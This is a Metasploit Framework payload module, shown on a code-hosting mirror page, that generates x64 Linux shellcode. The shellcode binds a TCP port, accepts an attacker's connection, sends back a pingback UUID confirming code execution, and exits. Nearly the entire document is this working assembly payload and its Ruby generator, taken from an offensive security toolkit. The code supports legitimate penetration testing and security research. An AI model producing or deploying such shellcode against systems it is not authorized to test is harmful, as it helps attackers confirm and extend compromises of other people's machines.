Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
module MetasploitModule

7
  CachedSize = 109

8


9
  include Msf::Payload::Linux::X64::Prepends

10
  include Msf::Payload::Single

11
  include Msf::Payload::Pingback

12
  include Msf::Payload::Pingback::Options

13


14
  def initialize(info = {})

15
    super(

16
      merge_info(

17
        info,

18
        'Name' => 'Linux x64 Pingback, Bind TCP Inline',

19
        'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',

20
        'Author' => [ 'bwatters-r7' ],

21
        'License' => MSF_LICENSE,

22
        'Platform' => 'linux',

23
        'Arch' => ARCH_X64,

24
        'Handler' => Msf::Handler::BindTcp,

25
        'Session' => Msf::Sessions::Pingback

26
      )

27
    )

28
  end

29


30
  def generate(_opts = {})

31
    # 22 -> "0x00,0x16"

32
    # 4444 -> "0x11,0x5c"

33
    encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first

34
    encoded_host = Rex::Socket.addr_aton('0.0.0.0').unpack('V').first

35
    encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })

36
    self.pingback_uuid ||= generate_pingback_uuid

37
    uuid_as_db = '0x' + pingback_uuid.chars.each_slice(2).map(&:join).join(',0x')

38


39
    asm = %^

40
          push   rsi

41
          push   rax

42
         ;SOCKET

43
          push   0x29

44
          pop    rax

45
          cdq

46
          push   0x2

47
          pop    rdi

48
          push   0x1

49
          pop    rsi

50
          syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)

51
          test   rax, rax

52
          js failed

53


54
        xchg   rdi, rax

55
          mov    rcx, #{encoded_host_port}

56
          push   rcx

57
          mov    rsi, rsp

58
          push   rsp

59
          pop    rsi                          ; store pointer to struct

60


61
        bind_call:

62
          ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)

63
          ; rdi -> fd already stored in rdi

64
          ; rsi -> pointer to sockaddr_in6 struct already in rsi

65
          push   0x31

66
          pop    rax                          ; bind syscall

67
          push   0x10                         ; sockaddr length

68
          pop    rdx                          ;

69
          syscall

70


71
        listen_call:

72
          ; int listen(int sockfd, int backlog);

73
          ; rdi -> fd already stored in rdi

74
          push   0x32

75
          pop    rax                          ; listen syscall

76
          push   0x1

77
          pop    rsi                          ; backlog

78
          syscall

79


80
        accept_call:

81
          ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);

82
          ; rdi -> fd already stored in rdi

83
          push   0x2b

84
          pop    rax                          ; accept syscall

85
          cdq                                 ; zero-out rdx via sign-extension

86
          push   rdx

87
          push   rdx

88
          push rsp

89
          pop rsi                             ; when populated, client will be stored in rsi

90
          push   0x1c

91
          lea    rdx, [rsp]                   ; pointer to length of rsi (16)

92
          syscall

93
          xchg    rdi, rax                    ; grab client fd

94
        send_pingback:

95
          ; sys_write(fd:rdi, buf*:rsi, length:rdx)

96
          push #{uuid_as_db.split(',').length}  ; length of the PINGBACK UUID

97
          pop rdx                               ; length in rdx

98
          call get_uuid_address         ; put uuid buffer on the stack

99
          db #{uuid_as_db}  ; PINGBACK_UUID

100
        get_uuid_address:

101
          pop rsi                       ; UUID address into rsi

102
          xor rax, rax                  ; sys_write = offset 1

103
          inc rax                       ; sys_write = offset 1

104
          syscall                       ; call sys_write

105


106
        failed:

107
          push   0x3c

108
          pop    rax

109
          push   0x1

110
          pop    rdi

111
          syscall ; exit(1)

112
        ^

113
    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string

114
  end

115
end

116


117